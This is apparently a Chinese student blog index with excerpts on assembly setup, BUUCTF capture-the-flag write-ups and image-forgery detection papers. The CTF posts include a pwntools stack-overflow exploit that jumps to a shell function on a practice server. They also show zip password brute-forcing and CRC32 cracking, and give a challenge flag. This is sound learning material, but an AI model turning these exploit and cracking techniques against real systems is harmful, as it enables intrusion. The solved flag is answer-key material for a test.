Sat Oct 24 2020 00:00:00 GMT+0800 (中国标准时间)
原创: 2020-10-24
2020-10-24最近新学习了汇编语言,在vs2019上配置汇编的环境花了很长的事件,总结一下我经过最近的悲惨经历之后的成果。
1,作为学习者,如果需要使用debug功能,最好是不要使用masmplus,因为它的自定义组件debug.exe在64位的windows系统上是不兼容的。debug.exe这个东西可能在几年前还是win的系统上自带的,但是现在而言,至少我的电脑上是没有的,如果在网上去找,还是可以找到的,但是还是没有什么用,因为不兼容呀。推荐还是使用vs2019,再装个插件。插件可以使用AsmDude,可以提供局部高亮。
2,如果以上的环境搭建还是无法让汇编启动,那么就需要**”INCLUDE Irvine32.inc“**这个东西了。这个Irvine的库非常的重要
https://www.lanzous.com/i6364hg
还是像配置上面的环境一样把这里的库配到vs2019的项目属性里面就可以了。
2021-3-21 数据包中的线索BUUCTF
原创: 2021/3/21 数据包中的线索BUUCTF
2021/3/21 数据包中的线索BUUCTF
https://buuoj.cn/challenges#%E6%95%B0%E6%8D%AE%E5%8C%85%E4%B8%AD%E7%9A%84%E7%BA%BF%E7%B4%A2 题目描述如上
我们拿到了一个流量包
老办法:先搜索一下字符串flag,发现找不到(万事休矣—–)
不知道为什么需要追踪http 流,那么发现找到的包里面很可能是base64编码。 https://the-x.cn/base64
下载文件,即可得到flag
32位汇编语言复习文档
原创: 32位汇编语言复习文档
32位汇编语言复习文档汇编使用C语言的参数 printf的参数从右向左push,最后再 call crt_printf 和 call crt_scanf; 调用伪指令 CALL
123456789101112131415161718192021222324.686.model flat, stdcall.stack 4096INCLUDE Irvine32.incINCLUDELIB Irvine32.libinclude F:\masm32\include\msvcrt.incincludelib F:\masm32\lib\msvcrt.lib.datame_str db 'hello world! %x\n',0me_input_int db '%d'int32_val dd 123ExitProcess proto,dwExitCode:dword .code main proc push offset int32_val push offset me_input_int call crt_scanf; ...
A Comparative Study on the Detection of Image Forgery of Tampered Background or Foreground
原创: A Comparative Study on the Detection of Image Forgery of Tampered Background or Foreground
A Comparative Study on the Detection of Image Forgery of Tampered Background or Foreground
A Comparative Study on the Detection of Image Forgery of Tampered Background or Foreground
2021 9th International Symposium on Digital Forensics and Security (ISDFS) | 978-1-6654-4481-1/21/$31.00 ©2021 IEEE | DOI: 10.1109/ISDFS52919.2021.9486363
对于图像前景/背景伪造的研究。这篇论文是数据集的论文。作者还是很有见地的,就是做的数据集 ...
A Deep Learning based Method for Image Splicing Detection
原创: A Deep Learning based Method for Image Splicing Detection
A Deep Learning based Method for Image Splicing Detection
Journal of Physics: Conference Series 1714 (2021) 012038 IOP Publishing doi:10.1088/1742-6596/1714/1/012038
Res50 进行特征的提取,保留得出的每一个结果。 使用SVM对于test进行分类.
输出的是图像是否经过篡改的二分类问题,不是像素级别的定位。
要是对图像总体进行二分类,那么acc单独作为指标也说得通。 要是对像素进行分类,还只给了acc,那就很过分了。
本文是对图像总体进行分类。
对比的方法不是很新,不过近年来也没有什么对图像进行是否篡改的二分类的文章,毕竟这个二分类没什么用。
A Skip Connection Architecture for Localization of Image Manipulations
原创: A Skip Connection Architecture for Localization of Image Manipulations
A Skip Connection Architecture for Localization of Image ManipulationsA Skip Connection Architecture for Localization of Image Manipulationscvpr2019
输入的图像固定为256 * 256 * 3 分为8*8个batch ,每个batch 不重叠,每个batch 为16 * 16 的分辨率 下方的信息流为LSTM 部分,输入为batch。上方信息流直接进行卷积运算,输入为完整的图像 256 * 256 。
跳跃连接三种不同的跳跃连接,通过实验挑选对于此问题最优的跳跃连接 这是使用无论图中的那个skip比较好的意思。
LSTM图像输入LSTM 。 先对图像进行二维转一维的转换,依据希尔伯特曲线。 依据分形理论,希尔伯特曲线可以历遍整个图像。 图像分为64个batch ,batch 按照希尔伯 ...
BUUCTF 二维码 1
原创: BUUCTF 二维码 1
BUUCTF 二维码 1 得到了一个QR-code。
二维码中 的信息是”secret is here”.
使用常用的解密工具,发现,在binwalk下可以得到有用信息。里面藏了一个压缩包。 获得了一个加密的压缩包。通过文件名提示,可以猜测,密码是4个数字,那么这个密码的解密难度就很低了。 使用爆破工具进行爆破,这里使用的是AZPR,不用5秒钟,可以得到解密文件,
Total passwords: 7,631 Total time: 4ms Average speed (passwords per second): 1,907,750 Password for this file: 7639 Password in HEX: 37 36 33 39
解压后,即可得到flag CTF{vjpw_wnoei}
但是,应当转为flag{}格式提交。
BUUCTF-rip 尝试PWN入门
原创: BUUCTF-rip 尝试PWN入门
BUUCTF-rip 尝试PWN入门BUUCTF-rip
拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符
在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。
一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。
1234567891011121314#python3 需要预先安装pwntoolsfrom pwn import *p = remote('node3.buuoj.cn', '27532') payload = b'a' * (0xf + 8) + p64(0x40118A) #这个b是转换为字节流,python3特色 #这个15+8 好像很神奇的样 ...
BUUCTF_zip 1 压缩包的研究_CRC32爆破
原创: BUUCTF_zip 1 压缩包的研究_CRC32爆破
BUUCTF_zip 1 压缩包的研究_CRC32爆破 拿到一堆的加密的压缩包,也不是伪加密,也不能爆破。我反正是爆破了所有8位的字母加数字密码。(要是弄一个中文进去,神仙也爆破不了) 但是每一个的大小倒是很小。
这个就很难办了。
原来有一个叫CRC32校验码的东西。
就是属性最后的那个东西。
之前有过拿相同校验码的文件,去破压缩包里的文件的题目,用到就是这个东西。 CRC32校验码就是用来检验文件内的数据是否正确的。
个人理解应该是做了一个不可逆的编码。
就像是有一个故事说的是:投标公司为了防止内鬼泄露价格消息,就做了一个“基于区块链的二次检验程序”。虽然不知道具体是怎么操作的。但是第一次提交要求把投递的计划书做一个不可逆加密。类似一个文件摘录吧。
信息不能从校验码复原,因为加密过程有损失,或者本来就没把完整的信息丢进去,但是可以从校验码发现信息是否有修改,因为校验码是以信息为明文加密的。
但是如果信息本身足够小,那么这个校验码就足够用来检验爆破的枚举的信息是否是原来的信息。真的是成也萧何,败也萧何。
...
CAT-Net- Compression Artifact Tracing Network for Detection and Localization of Image Splicing
原创: CAT-Net: Compression Artifact Tracing Network for Detection and Localization of Image Splicing
CAT-Net: Compression Artifact Tracing Network for Detection and Localization of Image Splicing图像篡改检测的定位分为三类: 基于块的检测 ,补丁检测,和像素级的检测
视觉线索和压缩伪影:可以作为两个依据来判定图像的篡改
视觉线索即像素之间的关系。对于单纯把视觉线索作为网络检测标准的网络,把复制粘贴到纯色背景的情况是绝对检测不出来的。在表格篡改和标语篡改中,这种情况还是很常见的。
而压缩伪影:特指Jpg压缩所用的DCT矩阵,一般还是识别jpg双压缩线索比较常见。ELA之类的。
池化:研究表明不适合图像的篡改检测,强化图像的内容,抑制噪声信号。池化可能在cv的其他领域的效果不错,但是在图像篡改检测邻域,会破坏图像像素之间的细微线索,导致检测的失败。 这个网络结构好像最近很流行,这种多分辨率融合网络, ...



